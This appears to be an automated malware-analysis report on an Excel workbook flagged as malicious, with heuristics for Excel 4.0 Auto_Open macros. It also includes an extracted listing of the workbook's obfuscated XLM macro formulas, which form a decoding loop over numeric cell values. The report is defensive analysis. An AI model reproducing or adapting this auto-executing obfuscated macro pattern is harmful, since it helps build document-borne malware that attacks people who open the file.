MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6814 bytes |
SHA-256: 495ff330244be341c8ffc2cc938f4770901e6b2761370e00ab9e4eee2d5a23a5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - hTAjNAWEJt
' 0018 21 LABEL : Cell Value, String Constant - AgLsTj len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B145
' 0018 27 LABEL : Cell Value, String Constant - bBLOuwvwxtdl len=0
' 0018 23 LABEL : Cell Value, String Constant - dKuWXtnI len=0
' 0018 27 LABEL : Cell Value, String Constant - DomVyTVEtPOG len=0
' 0018 23 LABEL : Cell Value, String Constant - hIIfgcdW len=0
' 0018 20 LABEL : Cell Value, String Constant - htogc len=0
' 0018 23 LABEL : Cell Value, String Constant - iZOJUdro len=0
' 0018 22 LABEL : Cell Value, String Constant - KAmQpnx len=0
' 0018 23 LABEL : Cell Value, String Constant - kHjahIPv len=0
' 0018 21 LABEL : Cell Value, String Constant - llpzsY len=0
' 0018 24 LABEL : Cell Value, String Constant - NjpmYCzVi len=0
' 0018 23 LABEL : Cell Value, String Constant - nxXMgQHv len=0
' 0018 25 LABEL : Cell Value, String Constant - oEvZqtDaWY len=0
' 0018 20 LABEL : Cell Value, String Constant - QaoiM len=0
' 0018 23 LABEL : Cell Value, String Constant - qNGtBcPj len=0
' 0018 23 LABEL : Cell Value, String Constant - sGGWBidL len=0
' 0018 26 LABEL : Cell Value, String Constant - sKhiDbNtydw len=0
' 0018 20 LABEL : Cell Value, String Constant - uAoAv len=0
' 0018 27 LABEL : Cell Value, String Constant - useqgOwjWPSI len=0
' 0018 26 LABEL : Cell Value, String Constant - XshFxksQqWw len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' hTAjNAWEJt,B49,"SET.NAME("sKhiDbNtydw",0+VALUE("0"))",""
' hTAjNAWEJt,B53,"SET.NAME("KAmQpnx",sKhiDbNtydw)",""
' hTAjNAWEJt,P54,"",-700.00000000000000000000
' hTAjNAWEJt,P55,"",-25.00000000000000000000
' hTAjNAWEJt,P56,"",82.00000000000000000000
' hTAjNAWEJt,B57,"SET.NAME("XshFxksQqWw",sKhiDbNtydw)",""
' hTAjNAWEJt,P57,"",-226.00000000000000000000
' hTAjNAWEJt,P58,"",566.00000000000000000000
' hTAjNAWEJt,P59,"",-979.00000000000000000000
' hTAjNAWEJt,B61,"SET.NAME("QaoiM",COUNTA(sGGWBidL))",""
' hTAjNAWEJt,B66,"SET.NAME("hIIfgcdW",COUNTA(nxXMgQHv))",""
' hTAjNAWEJt,B71,[],""
' hTAjNAWEJt,B74,"SET.NAME("htogc","")",""
' hTAjNAWEJt,B78,"KAmQpnx",""
' hTAjNAWEJt,B82,"SET.NAME("DomVyTVEtPOG",HLOOKUP("*",sGGWBidL,KAmQpnx,FALSE))",""
' hTAjNAWEJt,B84,"useqgOwjWPSI",""
' hTAjNAWEJt,B89,"SET.NAME("llpzsY",sKhiDbNtydw)",""
' hTAjNAWEJt,B91,[],""
' hTAjNAWEJt,B94,"llpzsY",""
' hTAjNAWEJt,B97,"bBLOuwvwxtdl",""
' hTAjNAWEJt,B100,"NjpmYCzVi",""
' hTAjNAWEJt,B104,"AgLsTj",""
' hTAjNAWEJt,B106,"SET.NAME("uAoAv",VALUE(HLOOKUP("*",nxXMgQHv,AgLsTj,FALSE)))",""
' hTAjNAWEJt,B111,"iZOJUdro",""
' hTAjNAWEJt,B114,"htogc",""
' hTAjNAWEJt,B119,"XshFxksQqWw",""
' hTAjNAWEJt,B123,NEXT(),""
' hTAjNAWEJt,B128,"oEvZqtDaWY",""
' hTAjNAWEJt,B133,[],""
' hTAjNAWEJt,B136,"qNGtBcPj",""
' hTAjNAWEJt,B138,NEXT(),""
' hTAjNAWEJt,B143,RETURN(),""
' hTAjNAWEJt,B166,"SET.NAME("kHjahIPv",B49)",""
' hTAjNAWEJt,B168,"sGGWBidL",""
' hTAjNAWEJt,B173,"SET.NAME("nxXMgQHv",R58C14)",""
' hTAjNAWEJt,B178,"SET.NAME("qNGtBcPj",184)",""
' hTAjNAWEJt,B181,"SET.NAME("dKuWXtnI",2)",""
' hTAjNAWEJt,B183,kHjahIPv(),""
' hTAjNAWEJt,B184,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.